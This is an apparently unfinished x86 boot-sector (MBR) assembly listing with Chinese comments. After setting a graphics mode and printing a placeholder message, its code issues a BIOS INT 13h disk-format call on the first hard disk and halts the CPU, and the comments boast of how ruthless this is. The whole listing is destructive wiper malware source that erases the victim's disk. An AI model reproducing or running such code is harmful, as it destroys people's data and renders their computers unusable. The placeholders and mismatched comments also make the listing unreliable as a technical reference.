MOV AH,00H;功能号01（设定显示模式）
MOV AL,05H；图形模式，分辨率320*200，4色
INT 10H；调用int10中断（BIOS显示）
MOV AH,0BH；功能号0b（设定调色盘）
MOV BH,00H；设背景色
MOV BL,05H；背景色05（紫红色）
INT 10H；同上
MOV AH,0BH；同上
MOV BH,01H；设调色盘
MOV BL,01H；调色盘1（青，紫红，白)
INT 10H；同上
MOV AH,13H；功能号13（显示字符串）
MOV BP,0000H；为后期预留的修改处，此处应是字符串在内存中开始地址后四位（ES寄存器储存前四位，这里已知MBR内存地址前四位为0000，因此无需修改）
MOV CX,AAAAH；为后期预留的修改处，此处应是字符串长度（算空格）
MOV DH,00H；在第一行处输出
MOV DL,00H；在第一列处输出
MOV BH,00H；页号，由于图形模式，只能为0
MOV AL,01H；输出模式1（光标跟随移动）
MOV BL,03H；字符为颜色3（青色）
INT 10H；同上
MOV AH,07H；功能号7（格式化磁盘）
MOV AL,03H；交错因子为3（这个概念很复杂，感兴趣的自行百度，默认为三就行，一般磁盘都是3）
MOV CX,0001H；从0磁道1扇区开始格式化
MOV DX,0080H；第一个逻辑分区的位置，默认就是0080
INT 13H；调用INT13中断（BIOS硬盘读写）
HLT；CPU停机到下个中断为止（这个够狠）
